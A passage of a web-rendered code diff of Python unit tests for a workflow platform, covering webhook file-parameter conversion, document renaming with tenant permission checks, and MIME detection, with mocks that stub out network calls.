method=Method.POST,
|
||||
content_type=ContentType.FORM_DATA,
|
||||
body=[
|
||||
WebhookBodyParameter(name="wrong_type", type="file", required=True),
|
||||
],
|
||||
)
|
||||
|
||||
variable_pool = VariablePool(
|
||||
system_variables=SystemVariable.empty(),
|
||||
user_inputs={
|
||||
"webhook_data": {
|
||||
"headers": {},
|
||||
"query_params": {},
|
||||
"body": {},
|
||||
"files": {
|
||||
"file": "not_a_dict", # Wrapped to match node expectation
|
||||
},
|
||||
}
|
||||
},
|
||||
)
|
||||
|
||||
node = create_webhook_node(data, variable_pool)
|
||||
|
||||
# Run the node without patches (should handle non-dict case gracefully)
|
||||
result = node._run()
|
||||
|
||||
# Verify successful execution
|
||||
assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED
|
||||
|
||||
# Verify fallback to original (wrapped) mapping
|
||||
assert result.outputs["_webhook_raw"]["files"]["file"] == "not_a_dict"
|
||||
|
||||
|
||||
def test_webhook_node_file_conversion_mixed_parameters():
|
||||
"""Test webhook node with mixed parameter types including files."""
|
||||
file_dict = create_test_file_dict("mixed_test.jpg")
|
||||
|
||||
data = WebhookData(
|
||||
title="Test Webhook Mixed Parameters",
|
||||
method=Method.POST,
|
||||
content_type=ContentType.FORM_DATA,
|
||||
headers=[],
|
||||
params=[],
|
||||
body=[
|
||||
WebhookBodyParameter(name="text_param", type="string", required=True),
|
||||
WebhookBodyParameter(name="number_param", type="number", required=False),
|
||||
WebhookBodyParameter(name="file_param", type="file", required=True),
|
||||
WebhookBodyParameter(name="bool_param", type="boolean", required=False),
|
||||
],
|
||||
)
|
||||
|
||||
variable_pool = VariablePool(
|
||||
system_variables=SystemVariable.empty(),
|
||||
user_inputs={
|
||||
"webhook_data": {
|
||||
"headers": {},
|
||||
"query_params": {},
|
||||
"body": {
|
||||
"text_param": "Hello World",
|
||||
"number_param": 42,
|
||||
"bool_param": True,
|
||||
},
|
||||
"files": {
|
||||
"file_param": file_dict,
|
||||
},
|
||||
}
|
||||
},
|
||||
)
|
||||
|
||||
node = create_webhook_node(data, variable_pool)
|
||||
|
||||
with (
|
||||
patch("factories.file_factory.build_from_mapping") as mock_file_factory,
|
||||
patch("core.workflow.nodes.trigger_webhook.node.build_segment_with_type") as mock_segment_factory,
|
||||
patch("core.workflow.nodes.trigger_webhook.node.FileVariable") as mock_file_variable,
|
||||
):
|
||||
# Setup mocks for file
|
||||
mock_file_obj = Mock()
|
||||
mock_file_factory.return_value = mock_file_obj
|
||||
|
||||
mock_segment = Mock()
|
||||
mock_segment.value = mock_file_obj
|
||||
mock_segment_factory.return_value = mock_segment
|
||||
|
||||
mock_file_var = Mock()
|
||||
mock_file_variable.return_value = mock_file_var
|
||||
|
||||
# Run the node
|
||||
result = node._run()
|
||||
|
||||
# Verify successful execution
|
||||
assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED
|
||||
|
||||
# Verify all parameters are present
|
||||
assert result.outputs["text_param"] == "Hello World"
|
||||
assert result.outputs["number_param"] == 42
|
||||
assert result.outputs["bool_param"] is True
|
||||
assert result.outputs["file_param"] == mock_file_var
|
||||
|
||||
# Verify file conversion was called
|
||||
mock_file_factory.assert_called_once_with(
|
||||
mapping=file_dict,
|
||||
tenant_id="test-tenant",
|
||||
)
|
||||
|
||||
|
||||
def test_webhook_node_different_file_types():
|
||||
"""Test webhook node file conversion with different file types."""
|
||||
image_dict = create_test_file_dict("image.jpg", "image")
|
||||
|
||||
data = WebhookData(
|
||||
title="Test Webhook Different File Types",
|
||||
method=Method.POST,
|
||||
content_type=ContentType.FORM_DATA,
|
||||
body=[
|
||||
WebhookBodyParameter(name="image", type="file", required=True),
|
||||
WebhookBodyParameter(name="document", type="file", required=True),
|
||||
WebhookBodyParameter(name="video", type="file", required=True),
|
||||
],
|
||||
)
|
||||
|
||||
variable_pool = VariablePool(
|
||||
system_variables=SystemVariable.empty(),
|
||||
user_inputs={
|
||||
"webhook_data": {
|
||||
"headers": {},
|
||||
"query_params": {},
|
||||
"body": {},
|
||||
"files": {
|
||||
"image": image_dict,
|
||||
"document": create_test_file_dict("document.pdf", "document"),
|
||||
"video": create_test_file_dict("video.mp4", "video"),
|
||||
},
|
||||
}
|
||||
},
|
||||
)
|
||||
|
||||
node = create_webhook_node(data, variable_pool)
|
||||
|
||||
with (
|
||||
patch("factories.file_factory.build_from_mapping") as mock_file_factory,
|
||||
patch("core.workflow.nodes.trigger_webhook.node.build_segment_with_type") as mock_segment_factory,
|
||||
patch("core.workflow.nodes.trigger_webhook.node.FileVariable") as mock_file_variable,
|
||||
):
|
||||
# Setup mocks for all files
|
||||
mock_file_objs = [Mock() for _ in range(3)]
|
||||
mock_segments = [Mock() for _ in range(3)]
|
||||
mock_file_vars = [Mock() for _ in range(3)]
|
||||
|
||||
# Map each segment.value to its corresponding mock file obj
|
||||
for seg, f in zip(mock_segments, mock_file_objs):
|
||||
seg.value = f
|
||||
|
||||
mock_file_factory.side_effect = mock_file_objs
|
||||
mock_segment_factory.side_effect = mock_segments
|
||||
mock_file_variable.side_effect = mock_file_vars
|
||||
|
||||
# Run the node
|
||||
result = node._run()
|
||||
|
||||
# Verify successful execution
|
||||
assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED
|
||||
|
||||
# Verify all file types were converted
|
||||
assert mock_file_factory.call_count == 3
|
||||
assert result.outputs["image"] == mock_file_vars[0]
|
||||
assert result.outputs["document"] == mock_file_vars[1]
|
||||
assert result.outputs["video"] == mock_file_vars[2]
|
||||
|
||||
|
||||
def test_webhook_node_file_conversion_with_non_dict_wrapper():
|
||||
"""Test webhook node file conversion when the file wrapper is not a dict."""
|
||||
data = WebhookData(
|
||||
title="Test Webhook with Non-dict File Wrapper",
|
||||
method=Method.POST,
|
||||
content_type=ContentType.FORM_DATA,
|
||||
body=[
|
||||
WebhookBodyParameter(name="non_dict_wrapper", type="file", required=True),
|
||||
],
|
||||
)
|
||||
|
||||
variable_pool = VariablePool(
|
||||
system_variables=SystemVariable.empty(),
|
||||
user_inputs={
|
||||
"webhook_data": {
|
||||
"headers": {},
|
||||
"query_params": {},
|
||||
"body": {},
|
||||
"files": {
|
||||
"file": "just a string",
|
||||
},
|
||||
}
|
||||
},
|
||||
)
|
||||
|
||||
node = create_webhook_node(data, variable_pool)
|
||||
result = node._run()
|
||||
|
||||
# Verify successful execution (should not crash)
|
||||
assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED
|
||||
# Verify fallback to original value
|
||||
assert result.outputs["_webhook_raw"]["files"]["file"] == "just a string"
|
||||
@ -1,8 +1,10 @@
|
||||
from unittest.mock import patch
|
||||
|
||||
import pytest
|
||||
|
||||
from core.app.entities.app_invoke_entities import InvokeFrom
|
||||
from core.file import File, FileTransferMethod, FileType
|
||||
from core.variables import StringVariable
|
||||
from core.variables import FileVariable, StringVariable
|
||||
from core.workflow.entities.graph_init_params import GraphInitParams
|
||||
from core.workflow.entities.workflow_node_execution import WorkflowNodeExecutionStatus
|
||||
from core.workflow.nodes.trigger_webhook.entities import (
|
||||
@ -27,26 +29,34 @@ def create_webhook_node(webhook_data: WebhookData, variable_pool: VariablePool)
|
||||
"data": webhook_data.model_dump(),
|
||||
}
|
||||
|
||||
graph_init_params = GraphInitParams(
|
||||
tenant_id="1",
|
||||
app_id="1",
|
||||
workflow_type=WorkflowType.WORKFLOW,
|
||||
workflow_id="1",
|
||||
graph_config={},
|
||||
user_id="1",
|
||||
user_from=UserFrom.ACCOUNT,
|
||||
invoke_from=InvokeFrom.SERVICE_API,
|
||||
call_depth=0,
|
||||
)
|
||||
runtime_state = GraphRuntimeState(
|
||||
variable_pool=variable_pool,
|
||||
start_at=0,
|
||||
)
|
||||
node = TriggerWebhookNode(
|
||||
id="1",
|
||||
config=node_config,
|
||||
graph_init_params=GraphInitParams(
|
||||
tenant_id="1",
|
||||
app_id="1",
|
||||
workflow_type=WorkflowType.WORKFLOW,
|
||||
workflow_id="1",
|
||||
graph_config={},
|
||||
user_id="1",
|
||||
user_from=UserFrom.ACCOUNT,
|
||||
invoke_from=InvokeFrom.SERVICE_API,
|
||||
call_depth=0,
|
||||
),
|
||||
graph_runtime_state=GraphRuntimeState(
|
||||
variable_pool=variable_pool,
|
||||
start_at=0,
|
||||
),
|
||||
graph_init_params=graph_init_params,
|
||||
graph_runtime_state=runtime_state,
|
||||
)
|
||||
|
||||
# Provide tenant_id for conversion path
|
||||
runtime_state.app_config = type("_AppCfg", (), {"tenant_id": "1"})()
|
||||
|
||||
# Compatibility alias for some nodes referencing `self.node_id`
|
||||
node.node_id = node.id
|
||||
|
||||
return node
|
||||
|
||||
|
||||
@ -246,20 +256,27 @@ def test_webhook_node_run_with_file_params():
|
||||
"query_params": {},
|
||||
"body": {},
|
||||
"files": {
|
||||
"upload": file1,
|
||||
"document": file2,
|
||||
"upload": file1.to_dict(),
|
||||
"document": file2.to_dict(),
|
||||
},
|
||||
}
|
||||
},
|
||||
)
|
||||
|
||||
node = create_webhook_node(data, variable_pool)
|
||||
result = node._run()
|
||||
# Mock the file factory to avoid DB-dependent validation on upload_file_id
|
||||
with patch("factories.file_factory.build_from_mapping") as mock_file_factory:
|
||||
|
||||
def _to_file(mapping, tenant_id, config=None, strict_type_validation=False):
|
||||
return File.model_validate(mapping)
|
||||
|
||||
mock_file_factory.side_effect = _to_file
|
||||
result = node._run()
|
||||
|
||||
assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED
|
||||
assert result.outputs["upload"] == file1
|
||||
assert result.outputs["document"] == file2
|
||||
assert result.outputs["missing_file"] is None
|
||||
assert isinstance(result.outputs["upload"], FileVariable)
|
||||
assert isinstance(result.outputs["document"], FileVariable)
|
||||
assert result.outputs["upload"].value.filename == "image.jpg"
|
||||
|
||||
|
||||
def test_webhook_node_run_mixed_parameters():
|
||||
@ -291,19 +308,27 @@ def test_webhook_node_run_mixed_parameters():
|
||||
"headers": {"Authorization": "Bearer token"},
|
||||
"query_params": {"version": "v1"},
|
||||
"body": {"message": "Test message"},
|
||||
"files": {"upload": file_obj},
|
||||
"files": {"upload": file_obj.to_dict()},
|
||||
}
|
||||
},
|
||||
)
|
||||
|
||||
node = create_webhook_node(data, variable_pool)
|
||||
result = node._run()
|
||||
# Mock the file factory to avoid DB-dependent validation on upload_file_id
|
||||
with patch("factories.file_factory.build_from_mapping") as mock_file_factory:
|
||||
|
||||
def _to_file(mapping, tenant_id, config=None, strict_type_validation=False):
|
||||
return File.model_validate(mapping)
|
||||
|
||||
mock_file_factory.side_effect = _to_file
|
||||
result = node._run()
|
||||
|
||||
assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED
|
||||
assert result.outputs["Authorization"] == "Bearer token"
|
||||
assert result.outputs["version"] == "v1"
|
||||
assert result.outputs["message"] == "Test message"
|
||||
assert result.outputs["upload"] == file_obj
|
||||
assert isinstance(result.outputs["upload"], FileVariable)
|
||||
assert result.outputs["upload"].value.filename == "test.jpg"
|
||||
assert "_webhook_raw" in result.outputs
|
||||
|
||||
|
||||
|
||||
@ -1,3 +1,5 @@
|
||||
from types import SimpleNamespace
|
||||
|
||||
import pytest
|
||||
|
||||
from core.file.enums import FileType
|
||||
@ -12,6 +14,36 @@ from core.workflow.system_variable import SystemVariable
|
||||
from core.workflow.workflow_entry import WorkflowEntry
|
||||
|
||||
|
||||
@pytest.fixture(autouse=True)
|
||||
def _mock_ssrf_head(monkeypatch):
|
||||
"""Avoid any real network requests during tests.
|
||||
|
||||
file_factory._get_remote_file_info() uses ssrf_proxy.head to inspect
|
||||
remote files. We stub it to return a minimal response object with
|
||||
headers so filename/mime/size can be derived deterministically.
|
||||
"""
|
||||
|
||||
def fake_head(url, *args, **kwargs):
|
||||
# choose a content-type by file suffix for determinism
|
||||
if url.endswith(".pdf"):
|
||||
ctype = "application/pdf"
|
||||
elif url.endswith(".jpg") or url.endswith(".jpeg"):
|
||||
ctype = "image/jpeg"
|
||||
elif url.endswith(".png"):
|
||||
ctype = "image/png"
|
||||
else:
|
||||
ctype = "application/octet-stream"
|
||||
filename = url.split("/")[-1] or "file.bin"
|
||||
headers = {
|
||||
"Content-Type": ctype,
|
||||
"Content-Disposition": f'attachment; filename="{filename}"',
|
||||
"Content-Length": "12345",
|
||||
}
|
||||
return SimpleNamespace(status_code=200, headers=headers)
|
||||
|
||||
monkeypatch.setattr("core.helper.ssrf_proxy.head", fake_head)
|
||||
|
||||
|
||||
class TestWorkflowEntry:
|
||||
"""Test WorkflowEntry class methods."""
|
||||
|
||||
|
||||
@ -0,0 +1,176 @@
|
||||
from types import SimpleNamespace
|
||||
from unittest.mock import Mock, create_autospec, patch
|
||||
|
||||
import pytest
|
||||
|
||||
from models import Account
|
||||
from services.dataset_service import DocumentService
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def mock_env():
|
||||
"""Patch dependencies used by DocumentService.rename_document.
|
||||
|
||||
Mocks:
|
||||
- DatasetService.get_dataset
|
||||
- DocumentService.get_document
|
||||
- current_user (with current_tenant_id)
|
||||
- db.session
|
||||
"""
|
||||
with (
|
||||
patch("services.dataset_service.DatasetService.get_dataset") as get_dataset,
|
||||
patch("services.dataset_service.DocumentService.get_document") as get_document,
|
||||
patch("services.dataset_service.current_user", create_autospec(Account, instance=True)) as current_user,
|
||||
patch("extensions.ext_database.db.session") as db_session,
|
||||
):
|
||||
current_user.current_tenant_id = "tenant-123"
|
||||
yield {
|
||||
"get_dataset": get_dataset,
|
||||
"get_document": get_document,
|
||||
"current_user": current_user,
|
||||
"db_session": db_session,
|
||||
}
|
||||
|
||||
|
||||
def make_dataset(dataset_id="dataset-123", tenant_id="tenant-123", built_in_field_enabled=False):
|
||||
return SimpleNamespace(id=dataset_id, tenant_id=tenant_id, built_in_field_enabled=built_in_field_enabled)
|
||||
|
||||
|
||||
def make_document(
|
||||
document_id="document-123",
|
||||
dataset_id="dataset-123",
|
||||
tenant_id="tenant-123",
|
||||
name="Old Name",
|
||||
data_source_info=None,
|
||||
doc_metadata=None,
|
||||
):
|
||||
doc = Mock()
|
||||
doc.id = document_id
|
||||
doc.dataset_id = dataset_id
|
||||
doc.tenant_id = tenant_id
|
||||
doc.name = name
|
||||
doc.data_source_info = data_source_info or {}
|
||||
# property-like usage in code relies on a dict
|
||||
doc.data_source_info_dict = dict(doc.data_source_info)
|
||||
doc.doc_metadata = dict(doc_metadata or {})
|
||||
return doc
|
||||
|
||||
|
||||
def test_rename_document_success(mock_env):
|
||||
dataset_id = "dataset-123"
|
||||
document_id = "document-123"
|
||||
new_name = "New Document Name"
|
||||
|
||||
dataset = make_dataset(dataset_id)
|
||||
document = make_document(document_id=document_id, dataset_id=dataset_id)
|
||||
|
||||
mock_env["get_dataset"].return_value = dataset
|
||||
mock_env["get_document"].return_value = document
|
||||
|
||||
result = DocumentService.rename_document(dataset_id, document_id, new_name)
|
||||
|
||||
assert result is document
|
||||
assert document.name == new_name
|
||||
mock_env["db_session"].add.assert_called_once_with(document)
|
||||
mock_env["db_session"].commit.assert_called_once()
|
||||
|
||||
|
||||
def test_rename_document_with_built_in_fields(mock_env):
|
||||
dataset_id = "dataset-123"
|
||||
document_id = "document-123"
|
||||
new_name = "Renamed"
|
||||
|
||||
dataset = make_dataset(dataset_id, built_in_field_enabled=True)
|
||||
document = make_document(document_id=document_id, dataset_id=dataset_id, doc_metadata={"foo": "bar"})
|
||||
|
||||
mock_env["get_dataset"].return_value = dataset
|
||||
mock_env["get_document"].return_value = document
|
||||
|
||||
DocumentService.rename_document(dataset_id, document_id, new_name)
|
||||
|
||||
assert document.name == new_name
|
||||
# BuiltInField.document_name == "document_name" in service code
|
||||
assert document.doc_metadata["document_name"] == new_name
|
||||
assert document.doc_metadata["foo"] == "bar"
|
||||
|
||||
|
||||
def test_rename_document_updates_upload_file_when_present(mock_env):
|
||||
dataset_id = "dataset-123"
|
||||
document_id = "document-123"
|
||||
new_name = "Renamed"
|
||||
file_id = "file-123"
|
||||
|
||||
dataset = make_dataset(dataset_id)
|
||||
document = make_document(
|
||||
document_id=document_id,
|
||||
dataset_id=dataset_id,
|
||||
data_source_info={"upload_file_id": file_id},
|
||||
)
|
||||
|
||||
mock_env["get_dataset"].return_value = dataset
|
||||
mock_env["get_document"].return_value = document
|
||||
|
||||
# Intercept UploadFile rename UPDATE chain
|
||||
mock_query = Mock()
|
||||
mock_query.where.return_value = mock_query
|
||||
mock_env["db_session"].query.return_value = mock_query
|
||||
|
||||
DocumentService.rename_document(dataset_id, document_id, new_name)
|
||||
|
||||
assert document.name == new_name
|
||||
mock_env["db_session"].query.assert_called() # update executed
|
||||
|
||||
|
||||
def test_rename_document_does_not_update_upload_file_when_missing_id(mock_env):
|
||||
"""
|
||||
When data_source_info_dict exists but does not contain "upload_file_id",
|
||||
UploadFile should not be updated.
|
||||
"""
|
||||
dataset_id = "dataset-123"
|
||||
document_id = "document-123"
|
||||
new_name = "Another Name"
|
||||
|
||||
dataset = make_dataset(dataset_id)
|
||||
# Ensure data_source_info_dict is truthy but lacks the key
|
||||
document = make_document(
|
||||
document_id=document_id,
|
||||
dataset_id=dataset_id,
|
||||
data_source_info={"url": "https://example.com"},
|
||||
)
|
||||
|
||||
mock_env["get_dataset"].return_value = dataset
|
||||
mock_env["get_document"].return_value = document
|
||||
|
||||
DocumentService.rename_document(dataset_id, document_id, new_name)
|
||||
|
||||
assert document.name == new_name
|
||||
# Should NOT attempt to update UploadFile
|
||||
mock_env["db_session"].query.assert_not_called()
|
||||
|
||||
|
||||
def test_rename_document_dataset_not_found(mock_env):
|
||||
mock_env["get_dataset"].return_value = None
|
||||
|
||||
with pytest.raises(ValueError, match="Dataset not found"):
|
||||
DocumentService.rename_document("missing", "doc", "x")
|
||||
|
||||
|
||||
def test_rename_document_not_found(mock_env):
|
||||
dataset = make_dataset("dataset-123")
|
||||
mock_env["get_dataset"].return_value = dataset
|
||||
mock_env["get_document"].return_value = None
|
||||
|
||||
with pytest.raises(ValueError, match="Document not found"):
|
||||
DocumentService.rename_document(dataset.id, "missing", "x")
|
||||
|
||||
|
||||
def test_rename_document_permission_denied_when_tenant_mismatch(mock_env):
|
||||
dataset = make_dataset("dataset-123")
|
||||
# different tenant than current_user.current_tenant_id
|
||||
document = make_document(dataset_id=dataset.id, tenant_id="tenant-other")
|
||||
|
||||
mock_env["get_dataset"].return_value = dataset
|
||||
mock_env["get_document"].return_value = document
|
||||
|
||||
with pytest.raises(ValueError, match="No permission"):
|
||||
DocumentService.rename_document(dataset.id, document.id, "x")
|
||||
@ -82,19 +82,19 @@ class TestWebhookServiceUnit:
|
||||
"/webhook",
|
||||
method="POST",
|
||||
headers={"Content-Type": "multipart/form-data"},
|
||||
data={"message": "test", "upload": file_storage},
|
||||
data={"message": "test", "file": file_storage},
|
||||
):
|
||||
webhook_trigger = MagicMock()
|
||||
webhook_trigger.tenant_id = "test_tenant"
|
||||
|
||||
with patch.object(WebhookService, "_process_file_uploads") as mock_process_files:
|
||||
mock_process_files.return_value = {"upload": "mocked_file_obj"}
|
||||
mock_process_files.return_value = {"file": "mocked_file_obj"}
|
||||
|
||||
webhook_data = WebhookService.extract_webhook_data(webhook_trigger)
|
||||
|
||||
assert webhook_data["method"] == "POST"
|
||||
assert webhook_data["body"]["message"] == "test"
|
||||
assert webhook_data["files"]["upload"] == "mocked_file_obj"
|
||||
assert webhook_data["files"]["file"] == "mocked_file_obj"
|
||||
mock_process_files.assert_called_once()
|
||||
|
||||
def test_extract_webhook_data_raw_text(self):
|
||||
@ -110,6 +110,70 @@ class TestWebhookServiceUnit:
|
||||
assert webhook_data["method"] == "POST"
|
||||
assert webhook_data["body"]["raw"] == "raw text content"
|
||||
|
||||
def test_extract_octet_stream_body_uses_detected_mime(self):
|
||||
"""Octet-stream uploads should rely on detected MIME type."""
|
||||
app = Flask(__name__)
|
||||
binary_content = b"plain text data"
|
||||
|
||||
with app.test_request_context(
|
||||
"/webhook", method="POST", headers={"Content-Type": "application/octet-stream"}, data=binary_content
|
||||
):
|
||||
webhook_trigger = MagicMock()
|
||||
mock_file = MagicMock()
|
||||
mock_file.to_dict.return_value = {"file": "data"}
|
||||
|
||||
with (
|
||||
patch.object(WebhookService, "_detect_binary_mimetype", return_value="text/plain") as mock_detect,
|
||||
patch.object(WebhookService, "_create_file_from_binary") as mock_create,
|
||||
):
|
||||
mock_create.return_value = mock_file
|
||||
body, files = WebhookService._extract_octet_stream_body(webhook_trigger)
|
||||
|
||||
assert body["raw"] == {"file": "data"}
|
||||
assert files == {}
|
||||
mock_detect.assert_called_once_with(binary_content)
|
||||
mock_create.assert_called_once()
|
||||
args = mock_create.call_args[0]
|
||||
assert args[0] == binary_content
|
||||
assert args[1] == "text/plain"
|
||||
assert args[2] is webhook_trigger
|
||||
|
||||
def test_detect_binary_mimetype_uses_magic(self, monkeypatch):
|
||||
"""python-magic output should be used when available."""
|
||||
fake_magic = MagicMock()
|
||||
fake_magic.from_buffer.return_value = "image/png"
|
||||
monkeypatch.setattr("services.trigger.webhook_service.magic", fake_magic)
|
||||
|
||||
result = WebhookService._detect_binary_mimetype(b"binary data")
|
||||
|
||||
assert result == "image/png"
|
||||
fake_magic.from_buffer.assert_called_once()
|
||||
|
||||
def test_detect_binary_mimetype_fallback_without_magic(self, monkeypatch):
|
||||
"""Fallback MIME type should be used when python-magic is unavailable."""
|
||||
monkeypatch.setattr("services.trigger.webhook_service.magic", None)
|
||||
|
||||
result = WebhookService._detect_binary_mimetype(b"binary data")
|
||||
|
||||
assert result == "application/octet-stream"
|
||||
|
||||
def test_detect_binary_mimetype_handles_magic_exception(self, monkeypatch):
|
||||
"""Fallback MIME type should be used when python-magic raises an exception."""
|
||||
try:
|
||||
import magic as real_magic
|
||||
except ImportError:
|
||||
pytest.skip("python-magic is not installed")
|
||||
|
||||
fake_magic = MagicMock()
|
||||
fake_magic.from_buffer.side_effect = real_magic.MagicException("magic error")
|
||||
monkeypatch.setattr("services.trigger.webhook_service.magic", fake_magic)
|
||||
|
||||
with patch("services.trigger.webhook_service.logger") as mock_logger:
|
||||
result = WebhookService._detect_binary_mimetype(b"binary data")
|
||||
|
||||
assert result == "application/octet-stream"
|
||||
mock_logger.debug.assert_called_once()
|
||||
|
||||
def test_extract_webhook_data_invalid_json(self):
|
||||
"""Test webhook data extraction with invalid JSON."""
|
||||
app = Flask(__name__)
|
||||
|
||||
Reference in New Issue
Block a user